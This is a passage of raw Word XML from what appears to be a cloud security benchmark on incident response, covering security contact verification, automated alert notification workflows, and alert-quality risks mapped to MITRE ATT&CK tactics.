        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Contact Verification Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65794367" w14:textId="659CB793" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Regular testing of contact information through Microsoft collaboration exercises and notification drills</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA77EF2" w14:textId="0F70FD19" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Contact Verification Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB73B26" w14:textId="7077EDC2" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Regular testing of contact information through Microsoft collaboration exercises and notification drills</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984FA3B" w14:textId="396C4B4F" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Multi-channel communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A0AA6" w14:textId="0CC99F17" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="002B41B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Email, SMS, and phone contact methods with clear escalation procedures when primary contacts are unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C4DBC" w14:textId="77777777" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00830ED5"/>
    <w:p w14:paraId="5BEE1CE7" w14:textId="70BD1DD2" w:rsidR="00E753AE" w:rsidRDefault="00E753AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Microsoft Defender for Cloud integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0A010" w14:textId="45D500C3" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Alert-triggered notifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF8627" w14:textId="1C845BF5" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Automatic notification generation for high and critical severity alerts with customizable thresholds and filtering criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562204BA" w14:textId="5C7C77F5" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Subscription-Level Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04455121" w14:textId="57F471C0" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Security contact configuration at appropriate scope levels including management groups, subscriptions, and resource groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006BDE09" w14:textId="20AFB0C8" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Notification Customization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F8CCDA" w14:textId="266CDCCD" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Custom notification templates including incident severity levels, affected resources, and initial response instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8EFF79" w14:textId="79D6E505" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Integration with Ticketing Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FC6F9" w14:textId="4C73CEFC" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Automated ticket creation in Azure DevOps, or other ITSM platforms for incident tracking and workflow management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28350BB8" w14:textId="77777777" w:rsidR="00EF1FF4" w:rsidRDefault="00EF1FF4" w:rsidP="00EF1FF4"/>
    <w:p w14:paraId="7E6B9FF3" w14:textId="01D603A7" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00E753AE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IR-2.2: Implement automated notification workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3E800" w14:textId="43B0ECFF" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Automated notification implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528DEE5" w14:textId="276D9DE3" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Logic Apps workflow automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737AC574" w14:textId="127812F8" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Triggered notification workflows based on security alert severity, affected resource types, and business impact assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D1465" w14:textId="3DBE337D" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Microsoft Sentinel Playbook Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88B34F" w14:textId="44CA2816" w:rsidR="00DA4D58" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Automated investigation and notification playbooks with enrichment capabilities and stakeholder determination logic (see Sentinel playbooks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF5EE3" w14:textId="660B48E3" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Stakeholder Matrix Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A1EBB" w14:textId="5444A175" w:rsidR="00E753AE" w:rsidRDefault="00E753AE" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00E753AE">
        <w:t>Role-based notification targeting including security teams, legal counsel, executive leadership, and compliance officers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E2F2D" w14:textId="1B1F36AF" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Regulatory notification templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75475301" w14:textId="7C55882B" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Pre-configured notification templates for GDPR, HIPAA, PCI-DSS, and other regulatory requirements with automated trigger conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD590F" w14:textId="5A3312BD" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Azure Monitor and Event Hub integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32128039" w14:textId="7C37D38E" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Custom alert rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33861E00" w14:textId="5FFFAECE" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Configurable alert rules for specific security events with automated notification workflows and stakeholder targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77358D" w14:textId="4821DE72" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Event Hub Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689579B6" w14:textId="662987F6" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t xml:space="preserve">Real-time </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>event</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA4D58">
        <w:t xml:space="preserve"> streaming to external systems including SIEM platforms, SOAR tools, and communication platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651F463" w14:textId="2EEC6D13" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Teams and Email Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D298874" w14:textId="71252C30" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Microsoft Teams channel notifications and email distribution lists with rich formatting and actionable buttons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B1D9B" w14:textId="06271DC7" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>External System Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF7118" w14:textId="3AA8224D" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00EF1FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>API-based integration with customer notification platforms, status pages, and communication management systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE83C7B" w14:textId="50FE554A" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00DA4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc242449537"/>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Detect, analyze, and investigate incidents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="2015F8AF" w14:textId="767A0D02" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00DA4D58">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc242449538"/>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>IR-3: Detection and analysis - create incidents based on high-quality alerts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="3D58662C" w14:textId="1CE9971A" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8CB52C" w14:textId="7996C0E3" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t xml:space="preserve">Implement high-quality alert generation through advanced analytics, threat intelligence integration, and continuous tuning to minimize false positives while ensuring comprehensive coverage of genuine security threats. Establish </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA4D58">
        <w:lastRenderedPageBreak/>
        <w:t>automated incident creation workflows with appropriate enrichment and escalation procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F53A2C" w14:textId="7E881691" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57D5F4A0" w14:textId="32913010" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Alert fatigue from false positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DD8957" w14:textId="35EC2E58" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Analysts become overwhelmed, leading to decreased attention, missed genuine threats, and delayed response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D0E2BD" w14:textId="30D2F738" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Critical threats buried in noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E77E4A" w14:textId="12366299" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>High-priority incidents disappear in alert volume, preventing timely detection and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EDEBE4" w14:textId="3CA1CF95" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Inefficient resource allocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32325402" w14:textId="4018A520" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Security teams waste time investigating false positives and low-priority alerts instead of focusing on genuine threats requiring immediate attention and skilled analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174CAC8" w14:textId="722FBC0E" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Delayed threat detection and response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A25B75" w14:textId="4D3DEE89" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Poor signal-to-noise ratio extends Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR), allowing attackers more time to achieve objectives and cause damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C258027" w14:textId="672226CE" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Inadequate threat intelligence integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCF983" w14:textId="72C24CC2" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Alerts lack contextual information, threat intelligence correlation, and risk scoring, preventing proper prioritization and effective response planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA4DC3" w14:textId="09B92657" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Inconsistent incident creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C78C15" w14:textId="41A2E030" w:rsidR="00DA4D58" w:rsidRPr="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00BF39C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Manual or ad-hoc incident creation processes result in missed escalations, inconsistent documentation, and lack of standardized response procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E36239" w14:textId="32EF233F" w:rsidR="00E753AE" w:rsidRDefault="00DA4D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F3CCF2" w14:textId="44E2FA70" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00A25C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94C6A0" w14:textId="6E284DB9" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00A25C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>masquerading (T1036) blending malicious activities with normal operations to avoid detection by poorly tuned alert systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D5DC6" w14:textId="69785EBB" w:rsidR="00DA4D58" w:rsidRDefault="00DA4D58" w:rsidP="00A25C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA4D58">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05134FFA" w14:textId="021B5E8E" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00A25C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>valid accounts (T1078) using legitimate credentials to perform malicious activities that may not trigger well-configured alerts for anomalous behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E93351" w14:textId="40DBE3C4" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="00A25C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27788B6D" w14:textId="7F08D65E" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00A25C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
